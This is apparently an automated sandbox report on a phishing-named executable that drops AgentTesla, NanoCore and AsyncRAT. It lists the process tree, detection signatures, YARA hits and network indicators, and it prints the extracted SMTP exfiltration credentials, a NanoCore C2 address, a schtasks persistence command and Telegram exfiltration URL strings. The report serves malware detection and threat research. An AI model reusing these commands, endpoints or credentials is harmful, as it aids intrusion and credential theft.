Loading ...

Play interactive tourEdit tour

Analysis Report Consignment Document PL&BL Draft.exe

Overview

General Information

Sample Name:Consignment Document PL&BL Draft.exe
Analysis ID:326301
MD5:b70ffeb2babbacb28b22411beccb4642
SHA1:3c096e92894c9ff7bfae0fcc0ce5f250cb4ebe9f
SHA256:623d707cab5c5dc378a5100018e29f88949f4ea4be4b34cc2fc36e1612b68100
Tags:AgentTeslaexeTNT

Most interesting Screenshot:

Detection

Nanocore AgentTesla AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Nanocore Rat
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM_3
Yara detected AsyncRAT
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • Consignment Document PL&BL Draft.exe (PID: 6620 cmdline: 'C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe' MD5: B70FFEB2BABBACB28B22411BECCB4642)
    • Consignment Document PL&BL Draft.exe (PID: 6796 cmdline: {path} MD5: B70FFEB2BABBACB28B22411BECCB4642)
      • Rczgwoxvqzh.exe (PID: 6872 cmdline: 'C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe' MD5: 01475371C9519A0C8F64B7606A0833E0)
        • Isgeprf.exe (PID: 6976 cmdline: 'C:\Users\user\AppData\Local\Temp\Isgeprf.exe' MD5: E2DA4F42475E01F7961EF2FB929DE54E)
          • cmd.exe (PID: 4420 cmdline: 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe'' & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • schtasks.exe (PID: 6340 cmdline: schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe'' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • cmd.exe (PID: 6316 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat'' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • timeout.exe (PID: 2168 cmdline: timeout 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
            • VLC2.exe (PID: 6228 cmdline: 'C:\Users\user\AppData\Local\Temp\VLC2.exe' MD5: E2DA4F42475E01F7961EF2FB929DE54E)
        • Fdquqwatjjr.exe (PID: 7032 cmdline: 'C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe' MD5: E8DC83A4ED7657D3211077B7F343FC3C)
      • Icda.exe (PID: 6888 cmdline: 'C:\Users\user\AppData\Local\Temp\Icda.exe' MD5: BB21F995740D8BC1549D9CBC32874DD8)
  • VLC2.exe (PID: 6008 cmdline: C:\Users\user\AppData\Local\Temp\VLC2.exe MD5: E2DA4F42475E01F7961EF2FB929DE54E)
  • dhcpmon.exe (PID: 6608 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: BB21F995740D8BC1549D9CBC32874DD8)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "gfumyAo", "URL: ": "https://dh2LZPEqfQO.net", "To: ": "mebarth@flood-protection.org", "ByHost: ": "mail.flood-protection.org:587", "Password: ": "932mpxGhMO2", "From: ": "sent@flood-protection.org"}

Threatname: NanoCore

{"C2: ": ["172.94.25.202"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\VLC2.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      C:\Users\user\AppData\Local\Temp\Icda.exeNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1018d:$x1: NanoCore.ClientPluginHost
      • 0x101ca:$x2: IClientNetworkHost
      • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      C:\Users\user\AppData\Local\Temp\Icda.exeNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xff05:$x1: NanoCore Client.exe
      • 0x1018d:$x2: NanoCore.ClientPluginHost
      • 0x117c6:$s1: PluginCommand
      • 0x117ba:$s2: FileCommand
      • 0x1266b:$s3: PipeExists
      • 0x18422:$s4: PipeCreated
      • 0x101b7:$s5: IClientLoggingHost
      C:\Users\user\AppData\Local\Temp\Icda.exeJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 6 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000004.00000000.242716308.0000000000712000.00000002.00020000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                00000004.00000002.263991887.0000000002BB2000.00000004.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  Click to see the 49 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  3.2.Icda.exe.56d0000.3.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
                  • 0xe75:$x1: NanoCore.ClientPluginHost
                  • 0xe8f:$x2: IClientNetworkHost
                  3.2.Icda.exe.56d0000.3.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
                  • 0xe75:$x2: NanoCore.ClientPluginHost
                  • 0x1261:$s3: PipeExists
                  • 0x1136:$s4: PipeCreated
                  • 0xeb0:$s5: IClientLoggingHost
                  17.0.dhcpmon.exe.c80000.0.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
                  • 0x1018d:$x1: NanoCore.ClientPluginHost
                  • 0x101ca:$x2: IClientNetworkHost
                  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
                  17.0.dhcpmon.exe.c80000.0.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
                  • 0xff05:$x1: NanoCore Client.exe
                  • 0x1018d:$x2: NanoCore.ClientPluginHost
                  • 0x117c6:$s1: PluginCommand
                  • 0x117ba:$s2: FileCommand
                  • 0x1266b:$s3: PipeExists
                  • 0x18422:$s4: PipeCreated
                  • 0x101b7:$s5: IClientLoggingHost
                  17.0.dhcpmon.exe.c80000.0.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
                    Click to see the 27 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: NanoCoreShow sources
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Icda.exe, ProcessId: 6888, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeAvira: detection malicious, Label: TR/Spy.Gen8
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeAvira: detection malicious, Label: HEUR/AGEN.1101060
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
                    Found malware configurationShow sources
                    Source: Icda.exe.6888.3.memstrMalware Configuration Extractor: NanoCore {"C2: ": ["172.94.25.202"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
                    Source: Fdquqwatjjr.exe.7032.5.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "gfumyAo", "URL: ": "https://dh2LZPEqfQO.net", "To: ": "mebarth@flood-protection.org", "ByHost: ": "mail.flood-protection.org:587", "Password: ": "932mpxGhMO2", "From: ": "sent@flood-protection.org"}
                    Multi AV Scanner detection for dropped fileShow sources
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 93%
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeReversingLabs: Detection: 66%
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeReversingLabs: Detection: 93%
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeReversingLabs: Detection: 86%
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeReversingLabs: Detection: 75%
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeReversingLabs: Detection: 86%
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: Consignment Document PL&BL Draft.exeVirustotal: Detection: 21%Perma Link
                    Yara detected Nanocore RATShow sources
                    Source: Yara matchFile source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Icda.exe PID: 6888, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
                    Source: Yara matchFile source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE
                    Machine Learning detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJoe Sandbox ML: detected
                    Machine Learning detection for sampleShow sources
                    Source: Consignment Document PL&BL Draft.exeJoe Sandbox ML: detected
                    Source: 17.0.dhcpmon.exe.c80000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 14.0.VLC2.exe.900000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 3.2.Icda.exe.a40000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 16.0.VLC2.exe.a0000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 3.0.Icda.exe.a40000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 3.2.Icda.exe.5970000.5.unpackAvira: Label: TR/NanoCore.fadte
                    Source: 14.2.VLC2.exe.900000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 16.2.VLC2.exe.a0000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 4.0.Isgeprf.exe.710000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 17.2.dhcpmon.exe.c80000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 4.2.Isgeprf.exe.710000.0.unpackAvira: Label: TR/Dropper.Gen

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49739 -> 85.187.154.178:587
                    Source: global trafficTCP traffic: 192.168.2.3:49739 -> 85.187.154.178:587
                    Source: Joe Sandbox ViewIP Address: 85.187.154.178 85.187.154.178
                    Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
                    Source: global trafficTCP traffic: 192.168.2.3:49739 -> 85.187.154.178:587
                    Source: unknownDNS traffic detected: queries for: centurygift.myq-see.com
                    Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                    Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: http://EAXDhR.com
                    Source: Fdquqwatjjr.exe, 00000005.00000002.492360953.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://flood-protection.org
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: Fdquqwatjjr.exe, 00000005.00000002.492360953.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://mail.flood-protection.org
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234335225.0000000003011000.00000004.00000001.sdmp, Isgeprf.exe, 00000004.00000002.263961602.0000000002B9E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                    Source: Rczgwoxvqzh.exe, 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000000.243567239.00000000004E2000.00000002.00020000.sdmp, Fdquqwatjjr.exe.2.drString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
                    Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                    Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.492360953.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: https://dh2LZPEqfQO.net
                    Source: Rczgwoxvqzh.exe, 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Fdquqwatjjr.exe, Fdquqwatjjr.exe.2.drString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected AsyncRATShow sources
                    Source: Yara matchFile source: 00000004.00000000.242716308.0000000000712000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.263991887.0000000002BB2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.271847625.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.283204276.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.266244520.0000000000902000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.263102745.0000000000712000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Isgeprf.exe PID: 6976, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Rczgwoxvqzh.exe PID: 6872, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: VLC2.exe PID: 6228, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: VLC2.exe PID: 6008, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\VLC2.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe, type: DROPPED
                    Source: Yara matchFile source: 14.0.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE
                    Source: Icda.exe, 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

                    E-Banking Fraud:

                    barindex
                    Yara detected Nanocore RATShow sources
